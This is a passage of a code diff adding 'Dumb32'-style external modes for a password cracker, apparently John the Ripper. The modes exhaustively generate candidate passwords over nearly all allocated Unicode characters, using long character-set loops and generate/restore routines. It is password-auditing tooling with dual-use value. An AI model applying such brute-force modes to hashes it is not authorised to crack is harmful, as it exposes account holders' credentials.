+		charset[i++] = c++;
+	c = 0x2bca;		// from TOP HALF BLACK CIRCLE
+	while (c <= 0x2bfe)	// ..to REVERSED RIGHT ANGLE
+		charset[i++] = c++;
+// 2C00..2C5F; Glagolitic
+	c = 0x2c00;		// from GLAGOLITIC CAPITAL LETTER AZU
+	while (c <= 0x2c2e)	// ..to GLAGOLITIC CAPITAL LETTER LATINATE MYSLITE
+		charset[i++] = c++;
+	c = 0x2c30;		// from GLAGOLITIC SMALL LETTER AZU
+	while (c <= 0x2c5e)	// ..to GLAGOLITIC SMALL LETTER LATINATE MYSLITE
+		charset[i++] = c++;
+// 2C60..2C7F; Latin Extended-C
+	c = 0x2c60;		// from LATIN CAPITAL LETTER L WITH DOUBLE BAR
+	while (c <= 0x2c7f)	// ..to LATIN CAPITAL LETTER Z WITH SWASH TAIL
+		charset[i++] = c++;
+// 2C80..2CFF; Coptic
+	c = 0x2c80;		// from COPTIC CAPITAL LETTER ALFA
+	while (c <= 0x2cf3)	// ..to COPTIC SMALL LETTER BOHAIRIC KHEI
+		charset[i++] = c++;
+	c = 0x2cf9;		// from COPTIC OLD NUBIAN FULL STOP
+	while (c <= 0x2cff)	// ..to COPTIC MORPHOLOGICAL DIVIDER
+		charset[i++] = c++;
+// 2D00..2D2F; Georgian Supplement
+	c = 0x2d00;		// from GEORGIAN SMALL LETTER AN
+	while (c <= 0x2d25)	// ..to GEORGIAN SMALL LETTER HOE
+		charset[i++] = c++;
+	c = 0x2d27;		// from GEORGIAN SMALL LETTER YN
+	while (c <= 0x2d2d)	// ..to GEORGIAN SMALL LETTER AEN
+		charset[i++] = c++;
+// 2D30..2D7F; Tifinagh
+	c = 0x2d30;		// from TIFINAGH LETTER YA
+	while (c <= 0x2d67)	// ..to TIFINAGH LETTER YO
+		charset[i++] = c++;
+	charset[i++] = 0x2d6f;	// TIFINAGH MODIFIER LETTER LABIALIZATION MARK
+	charset[i++] = 0x2d70;	// TIFINAGH SEPARATOR MARK
+	charset[i++] = 0x2d7f;	// TIFINAGH CONSONANT JOINER
+// 2D80..2DDF; Ethiopic Extended
+	c = 0x2d80;		// from ETHIOPIC SYLLABLE LOA
+	while (c <= 0x2d96)	// ..to ETHIOPIC SYLLABLE GGWE
+		charset[i++] = c++;
+	c = 0x2da0;		// from ETHIOPIC SYLLABLE SSA
+	while (c <= 0x2da6)	// ..to ETHIOPIC SYLLABLE SSO
+		charset[i++] = c++;
+	c = 0x2da8;		// from ETHIOPIC SYLLABLE CCA
+	while (c <= 0x2dae)	// ..to ETHIOPIC SYLLABLE CCO
+		charset[i++] = c++;
+	c = 0x2db0;		// from ETHIOPIC SYLLABLE ZZA
+	while (c <= 0x2db6)	// ..to ETHIOPIC SYLLABLE ZZO
+		charset[i++] = c++;
+	c = 0x2db8;		// from ETHIOPIC SYLLABLE CCHA
+	while (c <= 0x2dbe)	// ..to ETHIOPIC SYLLABLE CCHO
+		charset[i++] = c++;
+	c = 0x2dc0;		// from ETHIOPIC SYLLABLE QYA
+	while (c <= 0x2dc6)	// ..to ETHIOPIC SYLLABLE QYO
+		charset[i++] = c++;
+	c = 0x2dc8;		// from ETHIOPIC SYLLABLE KYA
+	while (c <= 0x2dce)	// ..to ETHIOPIC SYLLABLE KYO
+		charset[i++] = c++;
+	c = 0x2dd0;		// from ETHIOPIC SYLLABLE XYA
+	while (c <= 0x2dd6)	// ..to ETHIOPIC SYLLABLE XYO
+		charset[i++] = c++;
+	c = 0x2dd8;		// from ETHIOPIC SYLLABLE GYA
+	while (c <= 0x2dde)	// ..to ETHIOPIC SYLLABLE GYO
+		charset[i++] = c++;
+// 2DE0..2DFF; Cyrillic Extended-A
+	c = 0x2de0;		// from COMBINING CYRILLIC LETTER BE
+	while (c <= 0x2dff)	// ..to COMBINING CYRILLIC LETTER IOTIFIED BIG YUS
+		charset[i++] = c++;
+// 2E00..2E7F; Supplemental Punctuation
+	c = 0x2e00;		// from RIGHT ANGLE SUBSTITUTION MARKER
+	while (c <= 0x2e4e)	// ..to PUNCTUS ELEVATUS MARK
+		charset[i++] = c++;
+// 2E80..2EFF; CJK Radicals Supplement
+	c = 0x2e80;		// from CJK RADICAL REPEAT
+	while (c <= 0x2e99)	// ..to CJK RADICAL RAP
+		charset[i++] = c++;
+	c = 0x2e9b;		// from CJK RADICAL CHOKE
+	while (c <= 0x2ef3)	// ..to CJK RADICAL C-SIMPLIFIED TURTLE
+		charset[i++] = c++;
+// 2F00..2FDF; Kangxi Radicals
+	c = 0x2f00;		// from KANGXI RADICAL ONE
+	while (c <= 0x2fd5)	// ..to KANGXI RADICAL FLUTE
+		charset[i++] = c++;
+// 2FF0..2FFF; Ideographic Description Characters
+	c = 0x2ff0;		// from IDEOGRAPHIC DESCRIPTION CHARACTER LEFT TO RIGHT
+	while (c <= 0x2ffb)	// ..to IDEOGRAPHIC DESCRIPTION CHARACTER OVERLAID
+		charset[i++] = c++;
+// 3000..303F; CJK Symbols and Punctuation
+	c = 0x3000;		// from IDEOGRAPHIC SPACE
+	while (c <= 0x303f)	// ..to IDEOGRAPHIC HALF FILL SPACE
+		charset[i++] = c++;
+// 3040..309F; Hiragana
+	c = 0x3041;		// from HIRAGANA LETTER SMALL A
+	while (c <= 0x3096)	// ..to HIRAGANA LETTER SMALL KE
+		charset[i++] = c++;
+	c = 0x3099;		// from COMBINING KATAKANA-HIRAGANA VOICED SOUND MARK
+	while (c <= 0x309f)	// ..to HIRAGANA DIGRAPH YORI
+		charset[i++] = c++;
+// 30A0..30FF; Katakana
+	c = 0x30a0;		// from KATAKANA-HIRAGANA DOUBLE HYPHEN
+	while (c <= 0x30ff)	// ..to KATAKANA DIGRAPH KOTO
+		charset[i++] = c++;
+// 3100..312F; Bopomofo
+	c = 0x3105;		// from BOPOMOFO LETTER B
+	while (c <= 0x312f)	// ..to BOPOMOFO LETTER NN
+		charset[i++] = c++;
+// 3130..318F; Hangul Compatibility Jamo
+	c = 0x3131;		// from HANGUL LETTER KIYEOK
+	while (c <= 0x318e)	// ..to HANGUL LETTER ARAEAE
+		charset[i++] = c++;
+// 3190..319F; Kanbun
+	c = 0x3190;		// from IDEOGRAPHIC ANNOTATION LINKING MARK
+	while (c <= 0x319f)	// ..to IDEOGRAPHIC ANNOTATION MAN MARK
+		charset[i++] = c++;
+// 31A0..31BF; Bopomofo Extended
+	c = 0x31a0;		// from BOPOMOFO LETTER BU
+	while (c <= 0x31ba)	// ..to BOPOMOFO LETTER ZY
+		charset[i++] = c++;
+// 31C0..31EF; CJK Strokes
+	c = 0x31c0;		// from CJK STROKE T
+	while (c <= 0x31e3)	// ..to CJK STROKE Q
+		charset[i++] = c++;
+// 31F0..31FF; Katakana Phonetic Extensions
+	c = 0x31f0;		// from KATAKANA LETTER SMALL KU
+	while (c <= 0x31ff)	// ..to KATAKANA LETTER SMALL RO
+		charset[i++] = c++;
+// 3200..32FF; Enclosed CJK Letters and Months
+	c = 0x3200;		// from PARENTHESIZED HANGUL KIYEOK
+	while (c <= 0x321e)	// ..to PARENTHESIZED KOREAN CHARACTER O HU
+		charset[i++] = c++;
+	c = 0x3220;		// from PARENTHESIZED IDEOGRAPH ONE
+	while (c <= 0x32fe)	// ..to CIRCLED KATAKANA WO
+		charset[i++] = c++;
+// 3300..33FF; CJK Compatibility
+	c = 0x3300;		// from SQUARE APAATO
+	while (c <= 0x33ff)	// ..to SQUARE GAL
+		charset[i++] = c++;
+// 3400..4DBF; CJK Unified Ideographs Extension A
+	c = 0x3400;		// from <CJK Ideograph Extension A, First>
+	while (c <= 0x4db5)	// ..to <CJK Ideograph Extension A, Last>
+		charset[i++] = c++;
+// 4DC0..4DFF; Yijing Hexagram Symbols
+	c = 0x4dc0;		// from HEXAGRAM FOR THE CREATIVE HEAVEN
+	while (c <= 0x4dff)	// ..to HEXAGRAM FOR BEFORE COMPLETION
+		charset[i++] = c++;
+// 4E00..9FFF; CJK Unified Ideographs
+	c = 0x4e00;		// from <CJK Ideograph, First>
+	while (c <= 0x9fef)	// ..to <CJK Ideograph, Last>
+		charset[i++] = c++;
+// A000..A48F; Yi Syllables
+	c = 0xa000;		// from YI SYLLABLE IT
+	while (c <= 0xa48c)	// ..to YI SYLLABLE YYR
+		charset[i++] = c++;
+// A490..A4CF; Yi Radicals
+	c = 0xa490;		// from YI RADICAL QOT
+	while (c <= 0xa4c6)	// ..to YI RADICAL KE
+		charset[i++] = c++;
+// A4D0..A4FF; Lisu
+	c = 0xa4d0;		// from LISU LETTER BA
+	while (c <= 0xa4ff)	// ..to LISU PUNCTUATION FULL STOP
+		charset[i++] = c++;
+// A500..A63F; Vai
+	c = 0xa500;		// from VAI SYLLABLE EE
+	while (c <= 0xa62b)	// ..to VAI SYLLABLE NDOLE DO
+		charset[i++] = c++;
+// A640..A69F; Cyrillic Extended-B
+	c = 0xa640;		// from CYRILLIC CAPITAL LETTER ZEMLYA
+	while (c <= 0xa69f)	// ..to COMBINING CYRILLIC LETTER IOTIFIED E
+		charset[i++] = c++;
+// A6A0..A6FF; Bamum
+	c = 0xa6a0;		// from BAMUM LETTER A
+	while (c <= 0xa6f7)	// ..to BAMUM QUESTION MARK
+		charset[i++] = c++;
+// A700..A71F; Modifier Tone Letters
+	c = 0xa700;		// from MODIFIER LETTER CHINESE TONE YIN PING
+	while (c <= 0xa71f)	// ..to MODIFIER LETTER LOW INVERTED EXCLAMATION MARK
+		charset[i++] = c++;
+// A720..A7FF; Latin Extended-D
+	c = 0xa720;		// from MODIFIER LETTER STRESS AND HIGH TONE
+	while (c <= 0xa7b9)	// ..to LATIN SMALL LETTER U WITH STROKE
+		charset[i++] = c++;
+	c = 0xa7f7;		// from LATIN EPIGRAPHIC LETTER SIDEWAYS I
+	while (c <= 0xa7ff)	// ..to LATIN EPIGRAPHIC LETTER ARCHAIC M
+		charset[i++] = c++;
+// A800..A82F; Syloti Nagri
+	c = 0xa800;		// from SYLOTI NAGRI LETTER A
+	while (c <= 0xa82b)	// ..to SYLOTI NAGRI POETRY MARK-4
+		charset[i++] = c++;
+// A830..A83F; Common Indic Number Forms
+	c = 0xa830;		// from NORTH INDIC FRACTION ONE QUARTER
+	while (c <= 0xa839)	// ..to NORTH INDIC QUANTITY MARK
+		charset[i++] = c++;
+// A840..A87F; Phags-pa
+	c = 0xa840;		// from PHAGS-PA LETTER KA
+	while (c <= 0xa877)	// ..to PHAGS-PA MARK DOUBLE SHAD
+		charset[i++] = c++;
+// A880..A8DF; Saurashtra
+	c = 0xa880;		// from SAURASHTRA SIGN ANUSVARA
+	while (c <= 0xa8c5)	// ..to SAURASHTRA SIGN CANDRABINDU
+		charset[i++] = c++;
+	c = 0xa8ce;		// from SAURASHTRA DANDA
+	while (c <= 0xa8d9)	// ..to SAURASHTRA DIGIT NINE
+		charset[i++] = c++;
+// A8E0..A8FF; Devanagari Extended
+	c = 0xa8e0;		// from COMBINING DEVANAGARI DIGIT ZERO
+	while (c <= 0xa8ff)	// ..to DEVANAGARI VOWEL SIGN AY
+		charset[i++] = c++;
+// A900..A92F; Kayah Li
+	c = 0xa900;		// from KAYAH LI DIGIT ZERO
+	while (c <= 0xa92f)	// ..to KAYAH LI SIGN SHYA
+		charset[i++] = c++;
+// A930..A95F; Rejang
+	c = 0xa930;		// from REJANG LETTER KA
+	while (c <= 0xa953)	// ..to REJANG VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xa95f;	// REJANG SECTION MARK
+// A960..A97F; Hangul Jamo Extended-A
+	c = 0xa960;		// from HANGUL CHOSEONG TIKEUT-MIEUM
+	while (c <= 0xa97c)	// ..to HANGUL CHOSEONG SSANGYEORINHIEUH
+		charset[i++] = c++;
+// A980..A9DF; Javanese
+	c = 0xa980;		// from JAVANESE SIGN PANYANGGA
+	while (c <= 0xa9cd)	// ..to JAVANESE TURNED PADA PISELEH
+		charset[i++] = c++;
+	c = 0xa9cf;		// from JAVANESE PANGRANGKEP
+	while (c <= 0xa9d9)	// ..to JAVANESE DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xa9de;	// JAVANESE PADA TIRTA TUMETES
+	charset[i++] = 0xa9df;	// JAVANESE PADA ISEN-ISEN
+// A9E0..A9FF; Myanmar Extended-B
+	c = 0xa9e0;		// from MYANMAR LETTER SHAN GHA
+	while (c <= 0xa9fe)	// ..to MYANMAR LETTER TAI LAING BHA
+		charset[i++] = c++;
+// AA00..AA5F; Cham
+	c = 0xaa00;		// from CHAM LETTER A
+	while (c <= 0xaa36)	// ..to CHAM CONSONANT SIGN WA
+		charset[i++] = c++;
+	c = 0xaa40;		// from CHAM LETTER FINAL K
+	while (c <= 0xaa4d)	// ..to CHAM CONSONANT SIGN FINAL H
+		charset[i++] = c++;
+	c = 0xaa50;		// from CHAM DIGIT ZERO
+	while (c <= 0xaa59)	// ..to CHAM DIGIT NINE
+		charset[i++] = c++;
+	c = 0xaa5c;		// from CHAM PUNCTUATION SPIRAL
+	while (c <= 0xaa5f)	// ..to CHAM PUNCTUATION TRIPLE DANDA
+		charset[i++] = c++;
+// AA60..AA7F; Myanmar Extended-A
+	c = 0xaa60;		// from MYANMAR LETTER KHAMTI GA
+	while (c <= 0xaa7f)	// ..to MYANMAR LETTER SHWE PALAUNG SHA
+		charset[i++] = c++;
+// AA80..AADF; Tai Viet
+	c = 0xaa80;		// from TAI VIET LETTER LOW KO
+	while (c <= 0xaac2)	// ..to TAI VIET TONE MAI SONG
+		charset[i++] = c++;
+	c = 0xaadb;		// from TAI VIET SYMBOL KON
+	while (c <= 0xaadf)	// ..to TAI VIET SYMBOL KOI KOI
+		charset[i++] = c++;
+// AAE0..AAFF; Meetei Mayek Extensions
+	c = 0xaae0;		// from MEETEI MAYEK LETTER E
+	while (c <= 0xaaf6)	// ..to MEETEI MAYEK VIRAMA
+		charset[i++] = c++;
+// AB00..AB2F; Ethiopic Extended-A
+	c = 0xab01;		// from ETHIOPIC SYLLABLE TTHU
+	while (c <= 0xab06)	// ..to ETHIOPIC SYLLABLE TTHO
+		charset[i++] = c++;
+	c = 0xab09;		// from ETHIOPIC SYLLABLE DDHU
+	while (c <= 0xab0e)	// ..to ETHIOPIC SYLLABLE DDHO
+		charset[i++] = c++;
+	c = 0xab11;		// from ETHIOPIC SYLLABLE DZU
+	while (c <= 0xab16)	// ..to ETHIOPIC SYLLABLE DZO
+		charset[i++] = c++;
+	c = 0xab20;		// from ETHIOPIC SYLLABLE CCHHA
+	while (c <= 0xab26)	// ..to ETHIOPIC SYLLABLE CCHHO
+		charset[i++] = c++;
+	c = 0xab28;		// from ETHIOPIC SYLLABLE BBA
+	while (c <= 0xab2e)	// ..to ETHIOPIC SYLLABLE BBO
+		charset[i++] = c++;
+// AB30..AB6F; Latin Extended-E
+	c = 0xab30;		// from LATIN SMALL LETTER BARRED ALPHA
+	while (c <= 0xab65)	// ..to GREEK LETTER SMALL CAPITAL OMEGA
+		charset[i++] = c++;
+// AB70..ABBF; Cherokee Supplement
+	c = 0xab70;		// from CHEROKEE SMALL LETTER A
+	while (c <= 0xabbf)	// ..to CHEROKEE SMALL LETTER YA
+		charset[i++] = c++;
+// ABC0..ABFF; Meetei Mayek
+	c = 0xabc0;		// from MEETEI MAYEK LETTER KOK
+	while (c <= 0xabed)	// ..to MEETEI MAYEK APUN IYEK
+		charset[i++] = c++;
+	c = 0xabf0;		// from MEETEI MAYEK DIGIT ZERO
+	while (c <= 0xabf9)	// ..to MEETEI MAYEK DIGIT NINE
+		charset[i++] = c++;
+// AC00..D7AF; Hangul Syllables
+	c = 0xac00;		// from <Hangul Syllable, First>
+	while (c <= 0xd7a3)	// ..to <Hangul Syllable, Last>
+		charset[i++] = c++;
+// D7B0..D7FF; Hangul Jamo Extended-B
+	c = 0xd7b0;		// from HANGUL JUNGSEONG O-YEO
+	while (c <= 0xd7c6)	// ..to HANGUL JUNGSEONG ARAEA-E
+		charset[i++] = c++;
+	c = 0xd7cb;		// from HANGUL JONGSEONG NIEUN-RIEUL
+	while (c <= 0xd7fb)	// ..to HANGUL JONGSEONG PHIEUPH-THIEUTH
+		charset[i++] = c++;
+// D800..DB7F; High Surrogates
+// DB80..DBFF; High Private Use Surrogates
+// DC00..DFFF; Low Surrogates
+// E000..F8FF; Private Use Area
+// F900..FAFF; CJK Compatibility Ideographs
+	c = 0xf900;		// from CJK COMPATIBILITY IDEOGRAPH-F900
+	while (c <= 0xfa6d)	// ..to CJK COMPATIBILITY IDEOGRAPH-FA6D
+		charset[i++] = c++;
+	c = 0xfa70;		// from CJK COMPATIBILITY IDEOGRAPH-FA70
+	while (c <= 0xfad9)	// ..to CJK COMPATIBILITY IDEOGRAPH-FAD9
+		charset[i++] = c++;
+// FB00..FB4F; Alphabetic Presentation Forms
+	c = 0xfb00;		// from LATIN SMALL LIGATURE FF
+	while (c <= 0xfb06)	// ..to LATIN SMALL LIGATURE ST
+		charset[i++] = c++;
+	c = 0xfb13;		// from ARMENIAN SMALL LIGATURE MEN NOW
+	while (c <= 0xfb17)	// ..to ARMENIAN SMALL LIGATURE MEN XEH
+		charset[i++] = c++;
+	c = 0xfb1d;		// from HEBREW LETTER YOD WITH HIRIQ
+	while (c <= 0xfb36)	// ..to HEBREW LETTER ZAYIN WITH DAGESH
+		charset[i++] = c++;
+	c = 0xfb38;		// from HEBREW LETTER TET WITH DAGESH
+	while (c <= 0xfb3c)	// ..to HEBREW LETTER LAMED WITH DAGESH
+		charset[i++] = c++;
+	charset[i++] = 0xfb40;	// HEBREW LETTER NUN WITH DAGESH
+	charset[i++] = 0xfb41;	// HEBREW LETTER SAMEKH WITH DAGESH
+	charset[i++] = 0xfb43;	// HEBREW LETTER FINAL PE WITH DAGESH
+	charset[i++] = 0xfb44;	// HEBREW LETTER PE WITH DAGESH
+	c = 0xfb46;		// from HEBREW LETTER TSADI WITH DAGESH
+	while (c <= 0xfb4f)	// ..to HEBREW LIGATURE ALEF LAMED
+		charset[i++] = c++;
+// FB50..FDFF; Arabic Presentation Forms-A
+	c = 0xfb50;		// from ARABIC LETTER ALEF WASLA ISOLATED FORM
+	while (c <= 0xfbc1)	// ..to ARABIC SYMBOL SMALL TAH BELOW
+		charset[i++] = c++;
+	c = 0xfbd3;		// from ARABIC LETTER NG ISOLATED FORM
+	while (c <= 0xfd3f)	// ..to ORNATE RIGHT PARENTHESIS
+		charset[i++] = c++;
+	c = 0xfd50;		// from ARABIC LIGATURE TEH WITH JEEM WITH MEEM INITIAL FORM
+	while (c <= 0xfd8f)	// ..to ARABIC LIGATURE MEEM WITH KHAH WITH MEEM INITIAL FORM
+		charset[i++] = c++;
+	c = 0xfd92;		// from ARABIC LIGATURE MEEM WITH JEEM WITH KHAH INITIAL FORM
+	while (c <= 0xfdc7)	// ..to ARABIC LIGATURE NOON WITH JEEM WITH YEH FINAL FORM
+		charset[i++] = c++;
+	c = 0xfdf0;		// from ARABIC LIGATURE SALLA USED AS KORANIC STOP SIGN ISOLATED FORM
+	while (c <= 0xfdfd)	// ..to ARABIC LIGATURE BISMILLAH AR-RAHMAN AR-RAHEEM
+		charset[i++] = c++;
+// FE00..FE0F; Variation Selectors
+	c = 0xfe00;		// from VARIATION SELECTOR-1
+	while (c <= 0xfe0f)	// ..to VARIATION SELECTOR-16
+		charset[i++] = c++;
+// FE10..FE1F; Vertical Forms
+	c = 0xfe10;		// from PRESENTATION FORM FOR VERTICAL COMMA
+	while (c <= 0xfe19)	// ..to PRESENTATION FORM FOR VERTICAL HORIZONTAL ELLIPSIS
+		charset[i++] = c++;
+// FE20..FE2F; Combining Half Marks
+	c = 0xfe20;		// from COMBINING LIGATURE LEFT HALF
+	while (c <= 0xfe2f)	// ..to COMBINING CYRILLIC TITLO RIGHT HALF
+		charset[i++] = c++;
+// FE30..FE4F; CJK Compatibility Forms
+	c = 0xfe30;		// from PRESENTATION FORM FOR VERTICAL TWO DOT LEADER
+	while (c <= 0xfe4f)	// ..to WAVY LOW LINE
+		charset[i++] = c++;
+// FE50..FE6F; Small Form Variants
+	charset[i++] = 0xfe50;	// SMALL COMMA
+	charset[i++] = 0xfe52;	// SMALL FULL STOP
+	c = 0xfe54;		// from SMALL SEMICOLON
+	while (c <= 0xfe66)	// ..to SMALL EQUALS SIGN
+		charset[i++] = c++;
+	c = 0xfe68;		// from SMALL REVERSE SOLIDUS
+	while (c <= 0xfe6b)	// ..to SMALL COMMERCIAL AT
+		charset[i++] = c++;
+// FE70..FEFF; Arabic Presentation Forms-B
+	c = 0xfe70;		// from ARABIC FATHATAN ISOLATED FORM
+	while (c <= 0xfe74)	// ..to ARABIC KASRATAN ISOLATED FORM
+		charset[i++] = c++;
+	c = 0xfe76;		// from ARABIC FATHA ISOLATED FORM
+	while (c <= 0xfefc)	// ..to ARABIC LIGATURE LAM WITH ALEF FINAL FORM
+		charset[i++] = c++;
+	charset[i++] = 0xfeff;	// ZERO WIDTH NO-BREAK SPACE
+// FF00..FFEF; Halfwidth and Fullwidth Forms
+	c = 0xff01;		// from FULLWIDTH EXCLAMATION MARK
+	while (c <= 0xffbe)	// ..to HALFWIDTH HANGUL LETTER HIEUH
+		charset[i++] = c++;
+	c = 0xffc2;		// from HALFWIDTH HANGUL LETTER A
+	while (c <= 0xffc7)	// ..to HALFWIDTH HANGUL LETTER E
+		charset[i++] = c++;
+	c = 0xffca;		// from HALFWIDTH HANGUL LETTER YEO
+	while (c <= 0xffcf)	// ..to HALFWIDTH HANGUL LETTER OE
+		charset[i++] = c++;
+	c = 0xffd2;		// from HALFWIDTH HANGUL LETTER YO
+	while (c <= 0xffd7)	// ..to HALFWIDTH HANGUL LETTER YU
+		charset[i++] = c++;
+	charset[i++] = 0xffda;	// HALFWIDTH HANGUL LETTER EU
+	charset[i++] = 0xffdc;	// HALFWIDTH HANGUL LETTER I
+	c = 0xffe0;		// from FULLWIDTH CENT SIGN
+	while (c <= 0xffe6)	// ..to FULLWIDTH WON SIGN
+		charset[i++] = c++;
+	c = 0xffe8;		// from HALFWIDTH FORMS LIGHT VERTICAL
+	while (c <= 0xffee)	// ..to HALFWIDTH WHITE CIRCLE
+		charset[i++] = c++;
+// FFF0..FFFF; Specials
+	c = 0xfff9;		// from INTERLINEAR ANNOTATION ANCHOR
+	while (c <= 0xfffd)	// ..to REPLACEMENT CHARACTER
+		charset[i++] = c++;
+
+/* Zero-terminate it, and cache the first character */
+	charset[i] = 0;
+	c0 = charset[0];
+
+	last = minlength - 1;
+	i = 0;
+	while (i <= last) {
+		id[i] = 0;
+		word[i++] = c0;
+	}
+	lastid = -1;
+	word[i] = 0;
+
+/* We must init word with dummy data, it doesn't get set until filter() */
+	word = 1;
+}
+
+void generate()
+{
+	int i;
+
+/* Handle the typical case specially */
+	if (word[last] = charset[++lastid]) return;
+
+	lastid = 0;
+	word[i = last] = c0;
+	while (i--) {			// Have a preceding position?
+		if (word[i] = charset[++id[i]]) return;
+		id[i] = 0;
+		word[i] = c0;
+	}
+
+	if (++last < maxlength) {	// Next length?
+		id[last] = lastid = 0;
+		word[last] = c0;
+		word[last + 1] = 0;
+	} else				// We're done
+		word = 0;
+}
+
+void restore()
+{
+	int i, c;
+
+	/* Calculate the current length and infer the character indices */
+	last = 0;
+	while (c = word[last]) {
+		i = 0; while (charset[i] != c && charset[i]) i++;
+		if (!charset[i]) i = 0;	// Not found
+		id[last++] = i;
+	}
+	lastid = id[--last];
+}
@@ -0,0 +1,2368 @@
+# This  software is Copyright (c) 2012-2018 magnum, and it is hereby
+# released to the general public under the following terms:
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted.
+#
+# Generic implementation of "dumb" exhaustive search of FULL Unicode.
+# Default is to try *all* allocated characters in Unicode v11 (there's
+# 137,046 of them). Even if a fast format can exhaust two characters in one
+# hour, three characters would take 12 years...
+#
+# Note that these modes will handle --max-len differently than normal: They
+# will consider number of characters as opposed to number of bytes. This
+# means you can naturally just use e.g. --max-len=3 for generating all
+# three-character candidates (which may be up to 12 bytes each).
+#
+# Also note that for UTF-16 formats, the resulting plaintext size within the
+# format will be up to four bytes (two 16-bit words) due to use of surrogates
+# for characters above U+FFFF. This means a format which normally handles up
+# to 27 characters may be limited to only 13 characters, worst case.
+[List.External:Dumb32]
+int maxlength;            // Maximum password length to try
+int last;                 // Last character position, zero-based
+int lastid;               // Character index in the last position
+int id[0x7f];             // Current character indices for other positions
+int charset[0x22000], c0; // Characters
+
+void init()
+{
+	int minlength;
+	int i, c;
+
+	# Trigger UTF-32 handling in External mode
+	utf32 = 1;
+
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = 2;
+
+	# UTF-8 representation is up to 4x the character length
+	if (maxlength * 4 > cipher_limit)
+		maxlength = (cipher_limit + 3) / 4;
+/*
+ * This defines the character set. This is auto-generated from UnicodeData.txt
+ * and we skip control characters.
+ */
+	i = 0;
+// 0000..007F; Basic Latin
+	c = 0x20;		// from SPACE
+	while (c <= 0x7e)	// ..to TILDE
+		charset[i++] = c++;
+// 0080..00FF; Latin-1 Supplement
+	c = 0xa0;		// from NO-BREAK SPACE
+	while (c <= 0xff)	// ..to LATIN SMALL LETTER Y WITH DIAERESIS
+		charset[i++] = c++;
+// 0100..017F; Latin Extended-A
+	c = 0x100;		// from LATIN CAPITAL LETTER A WITH MACRON
+	while (c <= 0x17f)	// ..to LATIN SMALL LETTER LONG S
+		charset[i++] = c++;
+// 0180..024F; Latin Extended-B
+	c = 0x180;		// from LATIN SMALL LETTER B WITH STROKE
+	while (c <= 0x24f)	// ..to LATIN SMALL LETTER Y WITH STROKE
+		charset[i++] = c++;
+// 0250..02AF; IPA Extensions
+	c = 0x250;		// from LATIN SMALL LETTER TURNED A
+	while (c <= 0x2af)	// ..to LATIN SMALL LETTER TURNED H WITH FISHHOOK AND TAIL
+		charset[i++] = c++;
+// 02B0..02FF; Spacing Modifier Letters
+	c = 0x2b0;		// from MODIFIER LETTER SMALL H
+	while (c <= 0x2ff)	// ..to MODIFIER LETTER LOW LEFT ARROW
+		charset[i++] = c++;
+// 0300..036F; Combining Diacritical Marks
+	c = 0x300;		// from COMBINING GRAVE ACCENT
+	while (c <= 0x36f)	// ..to COMBINING LATIN SMALL LETTER X
+		charset[i++] = c++;
+// 0370..03FF; Greek and Coptic
+	c = 0x370;		// from GREEK CAPITAL LETTER HETA
+	while (c <= 0x377)	// ..to GREEK SMALL LETTER PAMPHYLIAN DIGAMMA
+		charset[i++] = c++;
+	c = 0x37a;		// from GREEK YPOGEGRAMMENI
+	while (c <= 0x37f)	// ..to GREEK CAPITAL LETTER YOT
+		charset[i++] = c++;
+	c = 0x384;		// from GREEK TONOS
+	while (c <= 0x38a)	// ..to GREEK CAPITAL LETTER IOTA WITH TONOS
+		charset[i++] = c++;
+	c = 0x38e;		// from GREEK CAPITAL LETTER UPSILON WITH TONOS
+	while (c <= 0x3a1)	// ..to GREEK CAPITAL LETTER RHO
+		charset[i++] = c++;
+	c = 0x3a3;		// from GREEK CAPITAL LETTER SIGMA
+	while (c <= 0x3ff)	// ..to GREEK CAPITAL REVERSED DOTTED LUNATE SIGMA SYMBOL
+		charset[i++] = c++;
+// 0400..04FF; Cyrillic
+	c = 0x400;		// from CYRILLIC CAPITAL LETTER IE WITH GRAVE
+	while (c <= 0x4ff)	// ..to CYRILLIC SMALL LETTER HA WITH STROKE
+		charset[i++] = c++;
+// 0500..052F; Cyrillic Supplement
+	c = 0x500;		// from CYRILLIC CAPITAL LETTER KOMI DE
+	while (c <= 0x52f)	// ..to CYRILLIC SMALL LETTER EL WITH DESCENDER
+		charset[i++] = c++;
+// 0530..058F; Armenian
+	c = 0x531;		// from ARMENIAN CAPITAL LETTER AYB
+	while (c <= 0x556)	// ..to ARMENIAN CAPITAL LETTER FEH
+		charset[i++] = c++;
+	c = 0x559;		// from ARMENIAN MODIFIER LETTER LEFT HALF RING
+	while (c <= 0x58a)	// ..to ARMENIAN HYPHEN
+		charset[i++] = c++;
+	charset[i++] = 0x58d;	// RIGHT-FACING ARMENIAN ETERNITY SIGN
+	charset[i++] = 0x58f;	// ARMENIAN DRAM SIGN
+// 0590..05FF; Hebrew
+	c = 0x591;		// from HEBREW ACCENT ETNAHTA
+	while (c <= 0x5c7)	// ..to HEBREW POINT QAMATS QATAN
+		charset[i++] = c++;
+	c = 0x5d0;		// from HEBREW LETTER ALEF
+	while (c <= 0x5ea)	// ..to HEBREW LETTER TAV
+		charset[i++] = c++;
+	c = 0x5ef;		// from HEBREW YOD TRIANGLE
+	while (c <= 0x5f4)	// ..to HEBREW PUNCTUATION GERSHAYIM
+		charset[i++] = c++;
+// 0600..06FF; Arabic
+	c = 0x600;		// from ARABIC NUMBER SIGN
+	while (c <= 0x61c)	// ..to ARABIC LETTER MARK
+		charset[i++] = c++;
+	c = 0x61e;		// from ARABIC TRIPLE DOT PUNCTUATION MARK
+	while (c <= 0x6ff)	// ..to ARABIC LETTER HEH WITH INVERTED V
+		charset[i++] = c++;
+// 0700..074F; Syriac
+	c = 0x700;		// from SYRIAC END OF PARAGRAPH
+	while (c <= 0x70d)	// ..to SYRIAC HARKLEAN ASTERISCUS
+		charset[i++] = c++;
+	c = 0x70f;		// from SYRIAC ABBREVIATION MARK
+	while (c <= 0x74a)	// ..to SYRIAC BARREKH
+		charset[i++] = c++;
+	charset[i++] = 0x74d;	// SYRIAC LETTER SOGDIAN ZHAIN
+	charset[i++] = 0x74f;	// SYRIAC LETTER SOGDIAN FE
+// 0750..077F; Arabic Supplement
+	c = 0x750;		// from ARABIC LETTER BEH WITH THREE DOTS HORIZONTALLY BELOW
+	while (c <= 0x77f)	// ..to ARABIC LETTER KAF WITH TWO DOTS ABOVE
+		charset[i++] = c++;
